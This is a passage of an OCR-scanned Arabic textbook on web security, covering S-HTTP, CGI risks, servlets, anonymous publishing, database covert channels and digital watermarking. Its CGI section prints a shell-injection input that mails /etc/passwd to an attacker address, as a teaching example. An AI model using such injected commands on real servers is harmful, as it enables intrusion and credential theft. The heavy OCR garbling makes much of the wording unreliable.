SHTTP-Symmetric-Content-Algorithms: recv-optional=DES-CBC, 2 


Y S-HTTP‏ يسبب مشاكل لوكالات S-HTIP‏ الغير مدركة . باستعمال مستوى 
إضافى للتغطية » من الممكن تنفيذ توثيق وكالة / موكل . وقيل توجيه رسالة OB e‏ 
الوكالة ترفع الغلاف الخارجى . 

من وجهة نظر وظيفية الامن » فان S-HTTP‏ هو حل مرن جدًا يمكنه تلبية كل 
إحتياجات أمن HTTP‏ . والمرونة فى هذه الحالة تعنى تعقيد . كذلك » يمكن إستعال 
S-HTTP‏ عمومًا HTTP J‏ فقط . هذه الحقيقة ونقص دعم البائعين من المحتمل أن 
يكون السبب الأساسى لعدم إنتشار S-HTTP‏ . ومنذ Web‏ (آی (HTTP‏ وقد تطورت 
على برنامج (plat form)‏ الانترنیت الرئيسى . وسيكون عمليا جدًا وجود هذه الوظيفية 
للأمن . ربا S-HTTP‏ قد يحصل على فرصة ثانية . 
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Web أمسن‎ 
Web Security : 

إدارة تحكم الوصول على جانب خادم Web‏ أصعب کنیا من على جاتب موكل 
Web‏ . الموكل (client)‏ ( أى المستعمل ) dole‏ له عدد محدود من علاقات الثقة 
للشركات والمؤسسات (مثل البنوك) والتى led‏ يعرف كعميل ويمكن أن يوثق بشهادة . 
وفى معظم الحالات » يمكن للموكل الحصول بسهولة على شهادة من خادم مؤسسة أو 
شركة . معظم خادمات Web‏ الشركات يتم الاتصال ما بواسطة مستخدمين غير 
معروفين كلية أو مستخدمين مغفولى الاسم . لذلك » لا يمكنهم عمومًا حماية آنفسهم 
بطلب توئیق موکل » ولکن يذلا من ذلك » باستع‌ال (Firewall) QA AST‏ وأمن 
نظام عامل بیثات Las‏ امنة BAN‏ محمولة . وعمومّا ۰ فان کل آنواع الالیات والتی 
تسمح لموكل بتنفیذ آمر على الخادم ( مثل Ob ge . (GGT‏ جانب pl‏ يجب أن 
تعاق ls‏ أو تزود لدی محدود فقط . 

هجوم رفض الخدمة (denial-of-service)‏ على جانب اخادمات له نتائج آکثر 
خطورة على خادمات Web‏ آکثر من موکلی Web‏ لأنه للخادمات » فان فقد التوفر 
يعنى فقد دحل (instruction detection) (les) Lats . (revenue)‏ يجب أن 
يكون قادرًا على المقاومة على الأقل للأنواع المعروفة للهجوم . 

إصدارات نشر Web‏ تتضمن نشر مغفول الاسم وحماية حقوق النسخ . كذلك © 
فان خادم Web‏ يجب أن ot‏ خاصة de‏ الأشياء الثميئة ‏ أى العلومة المختزنة 
عادة فى idel‏ بيانات » وی بعض االات تحتاج لحاية حقوق النسخ . 
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مشترك ممر عام (CGT)‏ : 

خادم Web‏ يمكنه إعادة وثائق HTML‏ الاستاتيكية وكذلك الوثائق المنشأة 
ديناميكيًا والتى تحتاج كدخل يمكن لستخدم أن يرسل معلومة على طلب الموكل مع 
sl) POST iù b‏ شكل Web‏ ملء فراغات) . طريقة GET‏ يمكن استعماها Lal‏ 
ولكن يجب تجنبها لأسباب أمنية » فيا عدا تساؤلات بسيطة . 

ولتوكيد وثيقة ديناميكية » يمكن لخادم Web‏ دعوة برنامج خلال CGI 3. CGI‏ 
عبارة عن بروتوكول لخادم Web‏ وبرنامج مكتوب ch‏ لغة برجة يمكنه أن يتصل . 
الخادم يشفر بيانات دخل الموكل ونص 061 ( أى البرنامج ) يحل شفرتها ويعالجها 
HTTP‏ التالية . ومن الواضح إذا أرسلت أى بيانات حساسة كاستجابة أو كطلب e‏ 
فان نقل البيانات يجب أن يكون Cape‏ ب SSL‏ (مثلاً) . ولسوء BH‏ . فان هذا لا يحل 
كل مشاكل الأمن والتی قد تنتج من استعمال CGI‏ بدون حرص . 

Site ‚sl (Common Gateway Interface) CGI‏ الممر العام فى الحقيقة عبارة 
عن آلية تدعم واقعيًا أى شخص ob‏ ينفذ برنامج من بعد بدخل ينتقى بحرية على 
خادم Web‏ . دودة الانترنيت وأمثلة أخرى بينت أن هذا يمكن أن يفتح بعض فجوات 
الأمن الخطيرة؛ fio‏ فيض العازل (buffer overflow)‏ . وکدفاع منطقی ضد ذلك 
اهجوم » يجب إستعال لغات de,‏ آمنة فقط » أى لغات تفحص قيود dile‏ دخل 
Java)‏ أو Perl‏ أو (Python‏ . كذلك ۰ فان نصوص CGT‏ يجب ألا تعطى تصرحات 
وصول ¿SÍ‏ من الضرورى bas‏ . بمعنى ID Ob » al‏ المستخدم الذى تنفذ تحته 
يجب ألا يكون الأصل (root)‏ أو بعض ID‏ الستخدم الأحرى القوية . 

بعض نصوص CGI‏ تستعما قيم دخل ( قيم شکل Web‏ الراجعة من JSA‏ ) 
لانشاء سم Call‏ سيفتح أو آمر لتشغيل Web pale‏ . الخطير خاصة هو هروب 
(shell scapes) shell‏ « والذى ob shev yl e‏ ينفذ على الخادم بطريقة فاسدة . 
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فمثلاً » نص Perl‏ على Web pale‏ المؤسس على UNIX‏ قد يحتوى على السطر التالى e‏ 
والذى یقحم أمر النظام معرف بين علامات الاقتباس : System ("mail $ input").‏ 
إذا كانت قيمة متغير الدخل هی ¿"user @ some.org,”‏ فلا توجد مشكلة . وإذا 
كانت تحتوى على الصف التالى ":" يستعمل لفصل : 


userdsome.org; cat /etc/passwd | mail attackerdsomeevil.org 


وسيحصل المهاجمون على بريد يحتوى على ملف كلمة السر » ويمكنهم حينئذ (من 
المکن أن يكون ناجخا ) هجوم قاموس . وفى هذه الحالة والحالات ALLEN‏ فانه لذلك 
يكون Els‏ فحص الدخل للهروب بحرص شديد ( أو لهذا امجوم الخاص ) باستعمال 
ملف كلمة سر صورة . 

حتى إذا كان الدخل من أشكال Web‏ تم فحصه عند الموكل بواسطة Java Script‏ 
Ss‏ » فان الخادم لن يكون sks‏ إذا كان الفحص قد تم Javascript)‏ قد يكون 
معاقا) أو كان IS‏ . ولنع أى بيانات ترد خلال خلاصات برنامج أو متغيرات بيئة أو 
قوائم دليل أو ملفات من أن تستعمل مباشرة أو مضمنة للتأثير على العام الخارجى (أى 
نظام التشغيل) . Perl‏ تعرف طور وصمة ل (taint mode‏ . کل البيانات الخارجية 
خاصة U4‏ آولاً آن تنقی Sly OU‏ میب عمل ذلك Lad‏ بحرص شدید . 

Bolo‏ » يمكن لخادم Web‏ أن یشکل بطريقة بحيث أن نصوص CGI‏ یمکن 
تواجدها على دلیل sae‏ فقط ( آی egi-bin‏ ( . وهذا يجب أن یکون التشکیل الفضل 
ai‏ خطبر > إذا آمکن بدء برنامج قوی ( مترجم Perl‏ أو (Shell‏ مثل نص CGI‏ . 
وذلك سيترك مهاجم اقحام آوامر موذية جدًا على خدام Web‏ 

حیث أن بدء أى معالجة ( أى نص 001 ) لكل طلب موکل هو مستهلك مورد 
ı We‏ فبعض خادمات Web‏ ما مترجم Perl‏ مطمور Ws‏ ( مثل (Apache‏ . 

بعض البائعین op SV‏ یقدمون APT‏ لدعم خادم Web‏ بالوظيفية العتادة أن تزود 
بواسطة نص CGI‏ . ( مثل N84۴1 < ISAPI‏ ) . ولسوء الحظ » فإن هذا السیناریو 
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للخادم » والعكس صحيح . والعلومات عن APIs‏ أخرى ( مثل FAST-CGL‏ 
(SAPI‏ يمكن امجادها . 

نصوص CGI‏ يمكن جعلها آمنة أكثر باستعال المغلفات أو الأغطية 
(Stein's box wrapper) « Ss .(Wrappers)‏ يعتبر ستقوق نص CGI‏ لتلك التى 
للمستخدم الذى أقحمها ( مثل ) أنه id py‏ للنص إلى (ID‏ وتر النتصوص 
لفجوات الأمن العامة . بالإضافة لذلك » فهو Lay‏ النص ف بيئة مقيدة . (صندوق 
آمن) والذى فيه الوصول لنظام CPUs all‏ والقرص وموارد نظام أخرى محدودة . 
كذلك » فان خادم Apache‏ له (wrapper) elke‏ مضمن 3 التوزيع (SuEXEc)‏ 
بحيث تفتح فجوات آمن جديدة . الاجاه cul EST‏ نصوص CGI‏ فى Appache‏ 
هو تعریف pole‏ واقعی جدید باسمه الخاص به > وأصل الوثيقة و ID‏ الستخدم لكل 
(Servlets )‏ : 

5 للخادمين مثل التطبيق "applets"‏ لمتصفحى le, . Web‏ تطبيقات 
8 تضيف وظيفية لموكل Web‏ المدعم ب Java‏ ۰ فان servlets‏ تضيف لخادم Web‏ 
المدعم Java a‏ ( أو أى خادم yl als‏ مدعم ب (Web‏ « بشرط أن الخادم يدعم 
Servlet API‏ . ويقال ale‏ أن التطبيقات Applets‏ محملة أدنى (downloaded)‏ 
بواسطة الموكل من الخادم » servlets Oly‏ عملة (uploaded) (fel‏ بواسطة الموكل 
للخادم . servlet‏ يمكن U dla!‏ وظيفية خادم Web‏ وتناول طلبات HTTP‏ . 
فمثلاً » لقراءة بيانات من شكل مدخل / HTML Clb‏ واستعمال منطق IÓN‏ 
المستعمل لتحديث قاعدة بيانات طلب شركة 2 
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امائل كثيرا مثل (Java applets)‏ أى تطبيقات Java‏ فان Ge servlets‏ على 
أصناف Java‏ فى Gj‏ شفرة servlets .(bytecode) col‏ تطلب نوع من الشفرة 
المحمولة (mobile code)‏ » لذلك Ol‏ كل إهتمامات الأمن بخصوص الشفرة المحمولة 
تطبق على servlets‏ آیضال > ومع آن ۲ مقحمة من متصفح ١‏ فهى تحت سياسة 
الأمن فى قوة لخادم Web‏ التی تنفذ علیها Gilly servlets cles‏ يحتوى ویتحکم فى 
servlets‏ خلال دورة lalo‏ قد يضع قيود أمن على el‏ التى Jay servers è‏ 
پاستعال بناء تصریح JDK 1.2 X‏ ومن الطبيعى » فى هذه الحالة فان شفرة servlet‏ 
قد تكون مطلوبة بأن توقع Lo)‏ بواسطة الموكل الذى تصدر منه . 
نشر Web‏ مجهول الاسم : (Rewebber)‏ 

قد يكون هناك أسباب كثيرة لسبب أن خادم Web‏ سيفضل أن يظل مغفول الاسم 
وغير متبوع . مثل » إذا كانت محتويات لصفحات Web‏ الخاصة به مثيرة لجموعة 
mis‏ من الناس ۱ 

Web یعطی إغفال إسم لکلا موكلى‎ Web هو خدمة‎ (JANUS أولاً‎ ( Rewebber 
مشابه للذى يغفل الاسم‎ Rewebber فإن‎ ۰ Web Wile ‚les . Web وخادمات‎ 
بمفتاح عام‎ URI يشفر جزء العنوان ل‎ Rewebbel ob « ببساطة‎ (anonimizer) 
هو الوحيد الذى يحل شفرته ) . جزء العنوان المستمر‎ Rewebber بحيث يكون‎ 54 
باغفال الاسم يمكن‎ Web pale بمعنى آخر‎ . base 64 الباقى هی مشفرة‎ URL و‎ 
: المشفر قد يبدو كما يل‎ URL فقط . فمثلاً » فإن‎ Webber الاتصال به خلال خادم‎ 


http://www.rewebber.de/surf_encrypted/gcm=SJGHE49shOfk34hKH(...) 


عندما يستقبل URL » Rewebber‏ مشفرة فانه يحل شفرة جزء العنوان ويوجه 
الطلب لخادم JUL y . Web‏ عند إرسال إجابة للموكل » فان Rewebber‏ يبحث عن 
كل مراجع العنوان فى الطلب ويشفرها بناء على ذلك . ويجب وجود الثقة فى Reweb-‏ 
ber‏ بواسطة خادمی web‏ باستعمال خدمته . 
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أمن قاعدة البيانات : 

قواعد البيانات الكبيرة توجد عادة على حاسبات الية خصصة ۰ تسمى خادمات 
قاعدة البيانات . وفى التشكيل العتاد » يوضع خادم Web‏ فى DMZ‏ بحيث يمكن 
الوصول له من الانترنيت »> وقد توجد Site‏ قاعدتى بيانات مختلفتين » واحدة يمكن 
الوصول لها بواسطة أى شخص ( مثل العملاء الكبار ) وأخرى يتم الوصول ها بعملاء 
أصليين (bona fide)‏ فقط . وفى هذه الحالة » كل من قاعدتى البيانات يمكن وجودها 
فى DMZ‏ منفصلة . وتشكيل حماية آخر ممكن أيضًا e‏ وأى تشكيل نختاره يعتمد Je‏ 

طلبات Web‏ تتضمن غالبًا تساؤلات قاعدة البيانات e‏ ولكن خادم قاعدة البيانات 
يجب الا يتم الوصول له مباشرة من الانترنيت ( أى يمكن وجوده خلف GA‏ 
وبناء على سياسة الأمن » فإن الوصول للشبكة يمكن تأمينه بواسطة بعض الطرق (مثل 
SSL/TLS‏ ) . لعمل قيود إضافية على الوصول e‏ فان أجزاء من قاعدة البيانات قد 
يتم تشفيرها » بإمكانية مفاتيح dike‏ لاجزاء مختلفة » بحيث أنه بالإضافة للتوثيق 
مطلوب مفتاح لقراءتها . تكامل البيانات يمكن حمايته بآلية مؤسسة على MAC‏ » 
ولسوء احظ lel‏ صعبة nee‏ لقاعدة البيانات مع التغيير السريع للمحتويات 5 نظام 
التجارة الالکترونية cht‏ لقاعدة بیانات لاختزان آنواع مختلفة من العلومات ۰ فى 
© معلومة آع‌ال . 
© معلومة تعامل تجاری . 

الستعملون لنظام تجارة إلكترونى یمکن أن یکونوا » مثلا عملاء » أو موظفین أو 
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شركاء آعمال . معلومة توثيق المستخدم قد تتضمن إسم المستخدم أو كلمة سر 
الستخدم أو المفاتيح العامة للمستخدم والشهادات المقابلة . معلومة توكيل الستخدم 
تحدد العلومة الضرورية لقرارات تحکم الوصول . ومن الواضح إن هذا النوع من 
العلومات يحتاج Ald‏ حريصة » فهو مصنوع Sale‏ بحيث لا يتم الوصول إليه کل 
لكل شخص في عدا مدير الأمن » أو لستخدم لتحديث بيانات توثيق شخصية فى 
بعض الحالات (مثل كلمة السر أو الفتاح) . 

معلومة الأعمال قد تتضمن أى معلومة مخصصة لنوع محدد من الأعمال » مثل معلومة 
تصنيع » ومعلومة بيع . أو حساب عميل أو معلومة طلب أو معلومة إمداد أو معلومة 
le are‏ > فان معلومة الأعمال تحتاج لسياسة حکم وصول أكثر تعقيدًا » OY‏ 
الشخص قد يلعب أدوارًا مختلفة أكثر بمستويات مختلفة للوصول ( مثل عملاء e‏ 
وشركاء Shel‏ و CEO‏ ومدير نظام وقطاع المبيعات وقطاع الحرص على العميل ) . 
بالإضافة لذلك » قد توجد أنواع مختلفة للمعلومة عند مستويات آمن مختلفة ( مثل 
شخصى أو سرى للغاية ) . ومن الواضح أن سياسة تحكم الوصول قد تصبح معقدة 
جدّا » لذلك فان دعم الأدوات قد يكون مطلوبًا لتأكيد استمراريته وحفظ موديل 
تحكم وصول محدد . بالإضافة OL‏ يكون Lal‏ فان BS‏ من قواعد بيانات التجارة 
الإلكترونية يجب أن تكون وقت حقيقى (real time)‏ أيضًا . وهذا يعنى أن تعامل 
قاعدة البيانات يجب أكاله قبل إنتهاء المهلة المحددة . وأمثلة لتلك التعاملات هی 
البحث أو المفاوضات أو الطلب أو عمل الفواتير أو الدفع أو التعاقد . بعض 
التعاملات قد تكون هامة أكثر من الأحرى . لذلك يحدد ها مستوى أسبقية أعلى . 
مثل » قد يكون من الهم أكثر تحديث معلومة البورصة بسرعة عن ارسال للعميل نتيجة 
البحث فى قوائم البورصة (stock market)‏ . كذلك » بعض التعاملات قد يكون لما 
مستوى أمن أعلى ما يعنى أن لما حقوق أكثر للوصول لبند بيانات . فى المثال السابق » 
فإن تعامل التحديث قد يكون له مستوى أمن أعلى ( مثل » وصول كتابة ) من تعامل 
البحث ( وصول قراءة ) . 
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لسوء الحظ » فان تلك السيناريوهات تجعل القنوات 4.241 (covert channels)‏ 
ممكنة » حتى إذا أسست عليها آلية تحكم سريان » مثل موديل Bell-LaPadula‏ . 
القناة الخفية تسمح بالنقل الغير مباشر للمعلومة من شخص له حقوق وصول أعلى . 

تعامل التحديث ف المثال السابق قد يغلق بند البيانات الذى يريد تحديثه . وحيث 
أن له أسبقية أعلى » فان تعامل البحث لن يكون قادرًا على التنفيذ أو يكتسب تأخير 
محدد . وهذا سيرسل إشارة لتعامل البحث ob‏ تعامل تحديث يتم حدوثه . وتحت 
بعض الظروف ۰ فقد تكون هذه الاشارة جزء ذو قيمة من المعلومة . هذا النوع من 
القناة الخفية يصاحب عادة بتحكم » مثلا فى» ويشار إليه بقناة التوقيت (timing‏ 
aly channel)‏ قنوات التوقيت بتعاملات قاعدة بيانات » فان تعاملات الأمن 
المنتخفض لن تكون قادرة على التمييز بين وجود أو CLE‏ تعاملات الأمن الأعلى . 
إحدى الطرق للوصول هذا هی إعطاء أسبقية fol‏ لتعاملات الأمن المنخفضة . وقد تم 
توضيح أن هجوم التوقيت المؤسس على وقت حساب القياس قد يجعل من الممكن 
استنتاج مفتاح خاص طوات حل التوقيع . 

عمومًا » ليس من الممكن تصميم قاعدة بيانات مأمونة كلية وتلبى بشدة 
إحتياجات الوقت الحقيقى . أمن التناوب ضد الحدوث فى حینه هو القترح لأن بعض 
تعاملات التجارة الالكترونية لا تتضمن مخاطرة كبيرة ( مثل المبالغ الصغيرة فى الدفع ) . 
وهذا الاتجاه يسمى الامن Binto. (partial security) (S31‏ و Haritsa‏ يستعملان 
إتجاه محعل الأمن عالى بقدر الامكان » ولكن يقللان عدد التعاملات المدمرة . 

مشكلة أخرى والتى قد تحدث خاصة فى قواعد البيانات الاحصائية هى الخاصة 
بالاستنتاج (inference)‏ . ويمكن وصف الاستنتاج (أو الاستدلال ) كنوع من قناة 
خفية مؤسس على التسريب الغير مرغوب للبيانات . فمثلاً » قاعدة UL‏ شركة قد 
تعطى معلومة إحصائية بطريقة بحيث يكون من المکن الوصول لبيانات لجموعتین 
من الأقسام Ol‏ فى قسم واحد فقط » ومن الممكن استنتاج البيانات للقسم الذى 
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بياناته مجموعة واحدة فقط ( مثل القسم الذى يبيع منتج محدد ) . الهدف من تحكم 
الاستنتاج هو تأكيد أن البيانات المحررة ( مثل إحصائيات ) بواسطة قاعدة البيانات لا 
تؤدى إلى كشف البيانات الشخصية . وفى معظم نظم التجارة الالكترونية » فإن كل 
الوصول لقاعدة البيانات مقيد لبرامج معالجة / الاستفسار (مثل SQL‏ : لغة التساؤل 
المهيكلة : ı (Structured Query Language‏ لذلك فان الآليات التى تضغط بقوة 
على الوصول والسريان وحکم الاستنتاج يمكن وضعها فى هذه البرامج . 

لسوء الحظ > OL‏ هجوم المتطفلين [tracker attacks]‏ والمبنى على استنتاج ممكن 
جزئيًا دات على الأقل إلى حدما . 
حماية حقوق النسخ : 

خدم الشبكة توزع أو تبیع معلومات فى شكل رقمى ۰ مثل برنامج الحاسب الآلى أو 
الموسيقى أو الصور أو الفيديو . ولسوء BH‏ » فإن المحتويات الرقمية يمكن نسخها 
بسهولة بدون ملاحظة الخادم الأصلى إلا إذا اتخذت إجراءات خاصة . العلامة المائية 
الرقمية (digital water mark)‏ تعمل على حماية الملكية الفكرية (intellectual prop-‏ 
erty)‏ للمحتويات متعددة الوسائط . وفئيًا » فان العلامة المائية الرقمية هى إشارة أو 
نموذج يضاف لمحتوى رقمى ( بواسطة المالك ) والتى يمكن كشطها أو إستخراجها 
بعد ذلك ( بواسطة المتسلم ) لعمل توكيد عن المحتوى . طريقة استخراج العلامة 
المائية تساعد على استخراج العلامة المائية الأصلية من المحتوى » ولكن ليس lla‏ 
لاستخراجها E‏ بسبب » مثل فقد بيانات أثناء ضغط الصورة أو الترشح أو المسح . 
كذلك » فمن الغالب أنه يناسب أكثر ( أى متين ) عمل طريقة كشف علامة مائية » 
والتى تختر العلاقة بين العلامة المائية والبيانات ( أى حساب احت‌ال أن تطمر العلامة 
المائية فى المحتوى ) . الاحتیاح العام أن العلامة المائية تتحمل ( أى يمكن استرجاعها 
بالرغم من التعديل المقصود أو الغير مقصود للمحتويات . زيادة على ذلك » فأن 
العلامة الائية يجب ألا تغير جودة الحتوی ذو العلامة الائية ویب أن تکون 


. شخص آنا مطمورة وماذا تعنی‎ AV للبرهنة‎ LG آی‎ » "nonrepudiable" 
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الكلمة "watermark"‏ أى العلامة الماثية تأتى من الوسيلة Cally‏ استعملت منذ 
آزمنة قديمة للوضع على الورقة شكل أو صورة أو نص مستنتج وارد من سالب فى قالب 
(mold)‏ . عمل العلامة المائية الرقمية له جذوره فى إخفاء (steganography)‏ والذى 
هدفه إخفاء وجود معلومات شخصية فى رسالة . وسائل الاعفاء الأولى كانت مؤسسة 
على LI‏ السرى Ste (invisible ink)‏ أو الققوب الدقيقة لدبوس على رموز منتقاة أو 
علامات قلم على رموز مكتوبة بالآلة. والوسائل الأحدث AË‏ الرسائل فى صورة 
رسومات » مئل استبدال أقل الارقام الثنائية رتبة لكل قيمة عنصر فى الصورة برقم AS‏ 
لرسالة سرية . وحیث أنه مکن dole‏ تحديد درجات آکثر للون عن العین البشرية وما 
یمکنها ملاحظته » فان استبدال آقل الارقام الثنائية رتبة لن يسبب تغییر ملحوظ فى 
الصورة . هذه الوسيلة پمکن استع‌اها LET‏ لاضافة علامة مائية رقمية » ولکنها لسوه 
الحظ ضعيفة التحمل ۰ حیث أن العلامة الائية یمکن تدميرها بسهولة . وسائل عمل 
العلامة الائية لحا خلفيتها فى (تصالات الطیف tol)‏ ونظرية الضوضاء » وکذلك 
الاخفاء الوسس على الحاسب الال . وعند إستعمال العلامة الائية UA‏ صور نص » 
فان تشفیر سطر النص ( أى إزاحة سطور نص LA‏ أو لأسفل ) » وتشفیر مسافة 
الکلمة (word space coding)‏ » أى تغيير مسافات الکلیات » وتشفیر الرموز ( آی 
تغییر آشکال الرموز ) یمکن BL cal‏ بطريقة بحیث أن التخييرات لا تدرك باحس . 

ولا توجد وسيلة علامة مائية یمکنها تلبية كل الاحتیاجات لكل التطبیقات . 
والعلامات الائية الرقمية یمکن استعياها لختلف خدمات dle‏ الوسائط الرقمية 
المختلفة : 
© تأكيد الملكية لأذاء ملكية عبر محتوی . ۱ 
© بصمه إصبع SLY (fingerprinting)‏ أى إزدواج غير قانونى وتوزيع SFE‏ 

بادخال علامة مائية داخل كل نسخة من المحتوى . 
© توثيق وتحقيق تكامل لربط ( بدون انفصال ) المؤلف بالمحتوى » لذلك فان كلا 

التوثيق للمؤلف وتأكيد الحتوی ل يتغير . 
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© تحكم استعمال للتحكم فى نسخ ومشاهدة المحتوى ل مثال Oly‏ عدد النسخ 
السموح بها ( فى العلامة المائية ) . 

© حماية المحتوى لختم الحتوی وبذلك إعاقة الاستعال الغير قانونى ( مثل إقحام 
علامة ماثية مرئية داخل رؤية مسبقة لحتوی متاح بحرية » وبذلك يجعلها غير ذات 
قيمة تجارية ۰ بعضى وسائل العلامة المائية تحتاج لمفتاح مستخدم (user key)‏ 
لادخال ( وكذلك استخراج ) وكشف علامة مائية . 


وسائل المفتاح السرية تستعمل نفس الفتاح لكلا إدخال العلامة المائية واستخراج/ 
كشف . ومن الواضح أن المفتاح السرى يجب أن يتصل بطريقة سرية من مالك 
المحتوى للمستقبل . وسائل المفتاح العام تشابه التوقيع الرقمي : المفتاح الخاص 
يستعمل لادخال العلامة المائية » والمفتاح العام لاستخراج / كشف العلامة ASU‏ . 
وهذه الوسيلة يمكن استع الما لخدمة التأكيد أو التوثيق وخدمة التكامل . 

العلامات المائية الرقمية يجب أن تتحمل أنواع مختلفة من الحجوم » فمثلاً » هجوم 
القوة (robustness attack)‏ يهدف لتقليل أو إزالة وجود العلامة ASU‏ بدون إتلاف 
الحتوی .. هجوم التقديم (presentation attack)‏ يعالج المحتويات بحیث لم تعد 
لعلامة المائية تستخرح / تكشف هجوم (interpretation attack) ia jl‏ تعادل قرة 

SAR العادمة ا‎ ISS سیعطی‎ as, 


۹۹ 


الباب الثامن 
مفاهيم التجارة الإلكترونية 
المؤسسة على الشبكة 
Web - Based‏ 


E - Commerce 
- Concepts 


Web - based E - Commarce Concepts : 


Oe‏ » لا توجد معايير لإطار التجارة الالكترونية » أو واحدة مدعمة بكثير من 
ف ا کی اعتبارها عبار حقیقی . وتستعمل y dalasi‏ 
التجارة ‏ إلى أعمال (مثل نصوص Java ۰ CGT‏ وحلول أعمال - إلى أعمال (مثل نظم 
وتطبيقات ومنتجات فى معالحة بیانات) . وق هذا الباب نقدم بعض الفاهیم المشوقة 
المؤسسة PEP « HTML: XML, lo‏ وکذلك فى تجارة (Java Commerce)‏ . 


e 


تعديم : 

مع أنه يوجد كثير من حلول حزم التجارة الالكترونية » والتى تقدمها شركات 
غتلفة مثل Java‏ أو CORBA‏ أو SAP‏ (نظم وتطبيقات ومنتجات فى معالحة البيانات 
«(Data Processing‏ 3‚ معظم الحالات فهی لاتقدم مقاهیم جديدة من وجهة نظر 
الأمن . وفى هذا الباب نقدم مفاهيم متعددة للتجارة الالكترونية المؤسسة على Web‏ 
وتجارة Java Commerce‏ المجموعة الأولى للتكنولوجيات مؤسسة XML LE‏ . رفع 
سعر (make up)‏ الدفع الدقيق (micropayment)‏ يعرف زيادة XTML‏ جديدة 
لدعم الدفع الدقيق . وهدف JEPT‏ هو عمل معيار وميكنة معالجة مباحثات طريقة 
الدفع ۱ hal‏ فان Java Commerce‏ تعطى إطار مؤسس على Java‏ للساح ببناء 
تطبیقات لتأمين تجارة الكترونية مؤسسة على قطع . 

مفاهيم مؤسسة على XML‏ : 

كثير من مفاهیم التجارة الالكترونية المؤسسة على XML‏ ثم إقتراحها حالياً وأذت 
فى الاعتبار للمعايرة . والسبب هو ليس فقط أن XML‏ مدمن مدرات (Hype)‏ « 
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. ولكن لأا تدعم واقعياً كل مزود لتعريف SLE‏ . وهذا عائق كبير فى التشغيل البينى 
والقبول المنتشر للتكنولوجيا » لذلك توجد بدايات البائعين المتعددين وتقدم لتعريف 
تعبيرات . wis,‏ بروتوكولات مشتركة (أى UCLP‏ والوجود WE . Contology‏ 
فليس من الواضح كيف تطور مجهودات المعايير فيها عدا أن المعايير ستؤسس على 
القطاع . على وجه الخصوص توجد أوليات للصناعة البينية لتعريف اختصارات 
XML tags)‏ المشتركة لقطاعات تجارية محدودة » مثل البيع المفتوح والسفر المفتوح 
والتجارة المفتوحة . وقد ذهبت الصناعة SS‏ خلال مهود EDT ps alte‏ 
(Electronic Data Interchange)‏ أى التبادل البينى للبيانات » لذلك فتوجد 
محاولات Lal‏ لاستعمال . تعبيرات121فى (XML / EDDXML‏ . أخيراً » فان بنية 
الأمم المتحدة لتسهيل التجارة والأعمال الالكترونية (UN / CEFACT)‏ وهيئة التقدم 
لمعايير المعلومات الميكلية (Structural Information standards : OAIS)‏ قد 
جعلت الاعمال الالكترونية 11× تمهيدية لتطوير إطار فنى والذى سيجعل من الممكن 
استعال SM‏ بطريقة متينة لتبادل كل البيانات للأعمال الالكترونية . ومن وجهة نظر 
الأمن» فان التوقيعات الرقمية (509.× أو 7 # PKCS‏ والقنوات الأمنة SSL / TLS)‏ 
أو (IP sec‏ يوصى بها فى معظم الحالات. واحد إطارات الدفع الجديد الواعد > 
AY‏ نيت » بروتوكول التجارة المفتوح (Internet Open Trading Protocol : 10TP)‏ 
وبقية هذا ctl‏ یعطی عرض مختصر لبعض المقترحات الأخرى المؤسسة على XML‏ 
والسائدة فى التجارة الالكترونية والمواصفات المقابلة يمكن إنجادها 3 (WWW Con-‏ 
sortium) (W3C)‏ فى صفحة (e-commerce)‏ إلا إذا وجد مرجع مختلف dus ad‏ 
التجارة الالكترونية . 

لغة تشكيل التجارة الالكترونية The Electronic Commerce Modeling)‏ 
(Language : ECML)‏ تعرف مجموعة حقول معلومات عيارية لتمكين الحافظات 
الالكترونية (electronic wallets)‏ من بائعين eH‏ الأشكال الخاصة بهم . والحقول 
يمكن تعريفها بواسطة » شكل HTML‏ مثلاً أو بواسطة أو تعامل 555 TOTP‏ ولا 
تعرف آليات أمن خاصة » ولکن يوصى باستی‌ال IPsec SSL/TLS‏ . 
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The Signed Document Markup الوثيقة الموقعة‎ 
Langugge(SDML 2.0 الاصدار الحالى‎ 


تعرف طريقة عامة للتوقيع رقمياً على وثيقة مؤسسة على نص ۰ قطاع واحد أو أكثر 
أو وثائق متعددة مع بعضها (مثل صفحات e Web‏ ورسائل البريد الالکترونی) . 
وکالعتاد فهو يستعمل مفتاح عام فى التشفير ووظائف مزيج التشفير . هيكل SGML‏ 
يعرف فى جزء بواسطة أى SGMLKStandard Generalized Markup Language)‏ 
هو تعميم للغة Financial Services Merkup Language (FSML)‏ المطورة 
بواسطة إتحاد تكنولوجيا الخدمات Financial Services Technology)FSMLAJSU‏ 
FSML . (Consortium‏ تعرف آجزاء الوثيقة المخصصة الطلوبة للفحوص الالكترونية 
(مثل التعبيرات المطلوبة لتحديد بنود بيانات محددة للشيك » وجل بنود البيانات 
واحتياجات المعالجة للشيكات الالكترونية . ومن الناحية الأخرى » IEFT XML‏ 
dejos‏ عمل التوقيع الرقمى (Digital Signatures Working Group)‏ وجموعة 
عمل توقيع W3C XML‏ هی مواصفات تطوير مجتمعة لتوقيع XML‏ . حالياً ليس من 
الواضح كيف تربط هاتان المواصفتان . آخبرا فان Commerce eXtensible Markup‏ 
Language (c XML)‏ بواسطة Ariba Ins‏ هى بروتوكول مؤسس على XML‏ بسيط 
لتعامل تجارة الكتروثية hel A‏ عبر الانزنیت . وقد بدا تطورها بواسطة 
میکروسوفت Ariba‏ ودعمت بواسطة عدد من الشرکات الأحرى (مشل ¿Visa‏ 
c XML . (NCR « Philips «Cisco Systems‏ تدعم محتوى الورد ومودیلات 
الكتالوج » متضمنة خدمات إدارة المحتوى وعالم التجارة الالكترونية وهيئات إصدار 
مؤسسة على Web‏ . فى الاصدار ۰1.0 فان عنصر إعتادى يستعمل للتوثيق على 
أساس ما USS‏ سر (SharedSecret)‏ أو توقيع رقمى (Digital Signature)‏ . 

رفع سعر الدفع الدقيق ) Micropayment Markup‏ ( 

مجموعة عمل رفع سعر الدفع الدقيق W3C‏ تعمل على إقتراح لطريقة قابلة للامتداد 
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والعمل البينى لطمر كل المعلومات الضرورية لبدء دفع دقيق فى صفحة (مرسلة م 
تاجر / pale‏ للمستهلك / الموكل. محتوى الدفع الدقيق يمكن الوصول له بطقطا 
نوع خاص معروف حديثاً من ilos‏ يشار له per - fee link ¿Loy‏ . والاقتراح محا 
طريقة للتشفير وصلات Per - Fee‏ خلال وثيقة HTML‏ . وهو لا يعنون مواضيع أم 
ترجع لارسال وصلة per - fee‏ من تاجر لمستهلك» مثل توثيق المتغيرات فى وصلة bo)‏ 
